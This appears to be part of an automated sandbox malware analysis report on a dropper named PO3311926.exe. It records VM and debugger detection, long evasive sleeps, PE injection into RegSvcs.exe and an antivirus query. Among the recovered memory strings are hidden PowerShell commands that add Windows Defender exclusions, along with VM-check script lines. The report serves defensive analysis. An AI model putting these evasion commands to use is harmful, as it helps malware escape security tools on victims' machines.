Source: nngqrvwq.xl.0.dr, nngqrvwq.xl.8.dr Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 1014 Jump to behavior
Found evasive API chain (date check)
Source: C:\Users\user\Desktop\PO3311926.exe Evasive API call chain: GetLocalTime,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin API coverage: 5.4 %
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe API coverage: 4.8 %
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\PO3311926.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BAA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_00BAA69B
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BBC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_00BBC220
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BCB348 FindFirstFileExA, 0_2_00BCB348
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005FE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 8_2_005FE387
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005FD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_005FD836
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005FDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_005FDB69
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_00609F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_00609F9F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_0060A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_0060A0FA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_0060A488 FindFirstFileW,Sleep,FindNextFileW,FindClose, 8_2_0060A488
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_006065F1 FindFirstFileW,FindNextFileW,FindClose, 8_2_006065F1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005CC642 FindFirstFileExW, 8_2_005CC642
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_00607248 FindFirstFileW,FindClose, 8_2_00607248
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_006072E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 8_2_006072E9
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00ACE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 20_2_00ACE387
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00ACD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 20_2_00ACD836
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00AD9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 20_2_00AD9F9F
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00ADA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 20_2_00ADA0FA
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00ADA488 FindFirstFileW,Sleep,FindNextFileW,FindClose, 20_2_00ADA488
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00AD65F1 FindFirstFileW,FindNextFileW,FindClose, 20_2_00AD65F1
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A9C642 FindFirstFileExW, 20_2_00A9C642
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00AD72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 20_2_00AD72E9
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00AD7248 FindFirstFileW,FindClose, 20_2_00AD7248
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00ACDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 20_2_00ACDB69
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BBE6A3 VirtualQuery,GetSystemInfo, 0_2_00BBE6A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: sdadbtvsh.bin.exe, 0000001A.00000003.1954957526.00000000015EA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareUser.exe
Source: sdadbtvsh.bin.exe, 00000023.00000003.2208566805.000000000179C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareService.exe
Source: nngqrvwq.xl.8.dr Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
Source: sdadbtvsh.bin.exe, 00000023.00000003.2209331519.000000000175B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: riveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
Source: sdadbtvsh.bin.exe, 0000001A.00000003.1953466654.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1954798613.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1954957526.00000000015EA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VBoxTray.exeM
Source: sdadbtvsh.bin, 00000008.00000003.1598994724.00000000016F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VboxService.exe") Then2JI
Source: sdadbtvsh.bin.exe, 00000014.00000002.1753584117.0000000000DEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VboxService.exei
Source: sdadbtvsh.bin.exe, 0000001A.00000003.1955630909.000000000158F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VBoxTray.exe") Thennd.x
Source: nngqrvwq.xl.8.dr Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1502498229.00000000016E4000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598994724.00000000016F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VBoxTray.exe") Then37
Source: RegSvcs.exe, 0000000F.00000002.2614141887.000000000D224000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: sdadbtvsh.bin, 00000008.00000003.1599977444.000000000173F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareService.exeM
Source: sdadbtvsh.bin.exe, 00000023.00000003.2208566805.000000000179C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareUser.exe+
Source: sdadbtvsh.bin.exe, 00000014.00000003.1745967153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VboxService.exe") Thenp7h
Source: sdadbtvsh.bin, 00000008.00000003.1598994724.00000000016F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") ThenG4
Source: sdadbtvsh.bin, 00000008.00000003.1599977444.000000000173F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareUser.exe/
Source: sdadbtvsh.bin, 00000008.00000003.1599039739.0000000001739000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VboxService.exe&Zo
Source: sdadbtvsh.bin.exe, 00000023.00000003.2130668327.0000000001744000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
Source: nngqrvwq.xl.8.dr Binary or memory string: If ProcessExists("VboxService.exe") Then
Source: sdadbtvsh.bin.exe, 0000001A.00000003.1879240531.0000000001595000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then60
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1597242290.0000000001734000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1599039739.0000000001739000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1747808847.0000000000DEC000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1741924175.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1745908071.0000000000DE5000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2205277299.0000000001793000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2206209315.0000000001795000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2208566805.000000000179C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VBoxTray.exe
Source: sdadbtvsh.bin.exe, 00000023.00000003.2208566805.000000000179C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VboxService.exeS
Source: sdadbtvsh.bin.exe, 00000023.00000003.2130668327.0000000001744000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
Source: sdadbtvsh.bin.exe, 0000001A.00000003.1953788447.00000000015A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VboxService.exe") ThenMY
Source: sdadbtvsh.bin.exe, 0000001A.00000003.1953788447.00000000015A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: riveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then60
Source: sdadbtvsh.bin.exe, 0000001A.00000003.1954957526.00000000015EA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareService.exeZ
Source: sdadbtvsh.bin.exe, 0000001A.00000003.1954957526.00000000015EA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VboxService.exe
Source: sdadbtvsh.bin.exe, 00000023.00000003.2130668327.0000000001744000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VboxService.exe") Theni
Source: sdadbtvsh.bin.exe, 00000023.00000003.2209677560.000000000173F000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000002.2210405778.0000000001742000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VBoxTray.exe") Then0.V
Source: sdadbtvsh.bin.exe, 00000014.00000002.1753337801.0000000000D92000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1752343208.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If ProcessExists("VBoxTray.exe") Then
Source: nngqrvwq.xl.0.dr, nngqrvwq.xl.8.dr Binary or memory string: If ProcessExists("VBoxTray.exe") Then
Source: C:\Users\user\Desktop\PO3311926.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_0EE33800 LdrInitializeThunk, 15_2_0EE33800
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_0060F3FF BlockInput, 8_2_0060F3FF
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BBF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00BBF838
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_00595D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 8_2_00595D78
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BC7DEE mov eax, dword ptr fs:[00000030h] 0_2_00BC7DEE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005B5078 mov eax, dword ptr fs:[00000030h] 8_2_005B5078
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A85078 mov eax, dword ptr fs:[00000030h] 20_2_00A85078
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BCC030 GetProcessHeap, 0_2_00BCC030
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BBF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00BBF838
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BBF9D5 SetUnhandledExceptionFilter, 0_2_00BBF9D5
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BBFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00BBFBCA
Source: C:\Users\user\Desktop\PO3311926.exe Code function: 0_2_00BC8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00BC8EBD
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005C29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_005C29B2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005B0BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_005B0BCF
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005B0D65 SetUnhandledExceptionFilter, 8_2_005B0D65
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005B0FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_005B0FB1
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A929B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_00A929B2
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A80BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_00A80BCF
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A80D65 SetUnhandledExceptionFilter, 20_2_00A80D65
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00A80FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_00A80FB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1340000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 500000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1300000 protect: page execute and read and write
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DA0000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1340000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 500000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1300000 value starts with: 4D5A
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DA0000 value starts with: 4D5A
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1340000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1053000 Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 500000 Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 3FB000 Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1300000
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1130000
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DA0000
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A0A000
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_005F1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 8_2_005F1A91
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_00593312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 8_2_00593312
Contains functionality to query the security center for anti-virus and firewall products
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")o7 memstr_db719c70-e
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc:/ memstr_52d311fb-b
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endifwt memstr_1adea4ad-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'", "", "", @sw_hide) memstr_48a30753-9
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbs'", "", "", @sw_hide)ckb memstr_7865dfaf-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbe'", "", "", @sw_hide)9hh memstr_a469d4bb-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbs'", "", "", @sw_hide)5z memstr_d316f5f9-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbe'", "", "", @sw_hide)ad memstr_fa9672a1-b
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllstructsetdata($var94, 1, "current_user")a( memstr_f885897a-e
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllstructsetdata($binbuffer, 1, $binary) memstr_2b5dc15c-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 877b273k memstr_ccf5875e-9
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllstructsetdata($var93, 1, "0x401fffff")}( memstr_4ec5496e-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $ppointer = dllstructgetptr($tbinary) memstr_bdc18e6f-2
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $idata = dllstructgetdata($tenries, 1, $i) memstr_a2719535-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func _runbinary_iswow64process($handlerpro) memstr_f2894a66-3
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ppeb = dllstructgetdata($tcontext, "ebx") memstr_ddfa9af3-b
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ppeb = dllstructgetdata($tcontext, "rdx") memstr_4b39e8ef-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if @error then return seterror(3, 0, false) memstr_a9cd552d-1
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $idelta = $paddressnew - $paddressold memstr_9f8e7e91-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $inumberofentries = ($isizeofblock - 8) / 2 memstr_a6350ff9-e
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ssssss = stringreplace($ssssss, "/", "0") memstr_b71ffba6-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2y$5) memstr_42e24c29-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $isizeofrawdata, $ppointertorawdatajwo memstr_7347109e-e
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $pmodule = dllstructgetptr($tmodule) memstr_9ba38748-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 029mujyu56dqv8iye)< memstr_aaf46e8f-d
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1l68fhh2nt3yvw9kku4fnp2 memstr_f0264e07-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: okab6221132e57hr423 memstr_16c221f0-0
